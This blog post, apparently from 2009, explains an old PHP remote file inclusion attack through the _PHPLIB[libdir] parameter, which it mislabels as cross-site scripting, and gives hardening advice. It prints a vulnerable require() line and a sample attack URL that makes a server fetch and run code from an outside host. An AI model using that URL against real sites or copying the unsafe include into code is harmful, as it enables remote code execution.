Bookmark and Share

_PHPLIB[libdir] Cross Site Scripting Exploit Explained

Posted: Tuesday, July 21st, 2009 at 8:41 pmUpdated: Sunday, September 6th, 2009 at 2:24 am

Lately, I’ve seen an increased attack of bad people trying to run XSS exploit on this website using _PHPLIB[libdir] exploit. It alarmed me a bit as I didn’t really know about that particular exploit. Obviously I wanted to make sure that my site is not vulnerable for it. So I did a little bit digging.

For WordPress users, you may also be interested in my other article on Updating wp-ban to include bad URLs.

What is _PHPLIB[libdir] exploit

It turned out that _PHPLIB[libdir] exploit is very old. I’ve seen reports of it dating way back to 2001. One thing I need to say that _PHPLIB is not part of standard variables PHP provides. It is a variable some software uses. Such software would have defined variable $_PHPLIB somewhere in settings or configuration file then have something like the following to include libraries:

require($_PHPLIB["libdir"] . "db_mysql.inc");

On some servers or PHP installation where register_globals is set to on, it may be possible to override the value to something the user pass. For example if originally your $_PHPLIB[“libdir”] variable is set to /home/john/public_html/libm then, assuming that you have PHP code as above, you’ll basically be including /home/john/public_html/lib/db_mysql.inc.

Now suppose someone access your website with URL like below
http://www.john.com/~john/index.php?_PHPLIB[libdir]=http://www.auctions4profit.info/uploaded/cache/id???????

If your $_PHPLIB[“libdir”] value is changed to whatever the bad person specifies as part of URL parameter, what happen is that you’ll be basically including a foreign file and that file would be executed within your website as if the file were hosted on your server. In sort, it is as if your code above is changed to:

require("http://www.auctions4profit.info/uploaded/cache/id???????db_mysql.inc");

So what are they trying to run

I’ve checked a few scripts that they actually trying to run on my server. There are slight variations of the script. General, it runs some PHP commands to gain information about your server:

  • Whether your PHP safe mode is on or off.
  • Runs php_uname() function to gain information about your operating system. This command has the same effec as running uname -a from your Unix / Linux shell prompt.
  • Find out how long your system’s uptime.
  • Find out the information about your webserver’s user account. Most people have this as nobody or www-data on Ubuntu.
  • Gets the directory location of your web server root by running getcwd() function.
  • Find out your PHP version information by running phpversion() function.
  • Find out your web server software, server hostname, and server IP address. Apache and lighttpd are popular ones I believe.
  • Finally, it prints information about your hard disk’s information like total size, used and free space.

Oh my! What can I do to protect myself

Well, given that the exploit is very old, chances are you’re pretty safe. Do follow best practice security as outlined in the PHP manual. I also found this blog entry to be very useful.

Another thing is to keep your software up to date. This includes PHP, your operating system and the software you use (Drupal / Joomla / WordPress / etc). PHP has gone a long way since 2001 to increase security.

In addition to all best practices, you may also want to install Suhosin from Hardened PHP Project. Good thing that Ubuntu’s PHP installation already comes with it.

Also, keep your password secure. Don’t set your password as password. Keep backup and audit your system periodically.

Thank you for reading this article. I hope you enjoyed this article. Please leave comments / suggestions / questions if you have. I’m looking forward to improving my solution with your comments / suggestions / questions.

Leave a Reply